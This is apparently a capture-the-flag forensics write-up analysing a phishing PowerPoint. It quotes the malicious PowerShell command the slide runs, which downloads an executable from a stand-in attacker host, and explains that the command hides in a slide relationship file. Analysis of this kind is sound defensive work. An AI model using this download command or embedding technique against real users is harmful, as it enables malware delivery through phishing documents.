Tag List
Sign In

AlienPhish

In this forensics challenge we are given a Powerpoint that we need to analyse. The will be expecting there to be macros that we will need to analyse / Reverse Engieer to figure out the flag.

We can first use olevba for this, this is a tool by Philippe Lagadec who has made a whole collection of Office Forensics tools.

──(kali㉿kali)-[~]
└─$ olevba Alien\ Weaknesses.pptx             
olevba 0.56.1 on Python 3.9.1 - http://decalage.info/python/oletools
===============================================================================
FILE: Alien Weaknesses.pptx
Type: OpenXML
No VBA macros found.

However, as seen above there are no macros in the file.

Instead of further analysis, we can simply run the (likely) malicious file in a malware sandbox. I tend to use app.any.run for this, although you do need to register.

I created a public task and uploaded the file, what the sandbox does is allow the file to run, and records all actions that it performs for later analysis. It also allows you to interact with the sandbox (mouse, keyboard, etc.) in order to trigger the malware to run, as not all malware will run when you run the file (as in this case).

The public task can be seen here.

On the right hand side there is a table containing all the subsequent processes run by the file. These look interesting.

The main one of interest is:

powershell  -c "$o = $env:temp + 'Q0hUQntwSDFzSGlOZ193MF9tNGNyMHM_Pz99.exe'; iwr http:/destroyearth.alien/x.exe -outfile $o"

This is the final command that is run, essentially we have let the malware deobfuscate itself and are just looking at the final command executed.

There is an encoded string in the command, which we can decode using CyberChef. The recipe is here&input=UTBoVVFudHdTREZ6U0dsT1oxOTNNRjl0TkdOeU1ITV9Qejk5), it uses Base 64 encoding, with XML safe characters. As we can see from the recipe, the flag is CHTB{pH1sHiNg_w0_m4cr0s>??}. Evidently, the malicious file does not use macros.

So, if not macros, then how?

It turns out that the command that was executed is stored in slides/_rels/slide1.xml.rels (a Powerpoint/Excel/Word/etc. is actually just a Zip). And the command is run after we confirm the prompt that shows up when the presentation is run. Ref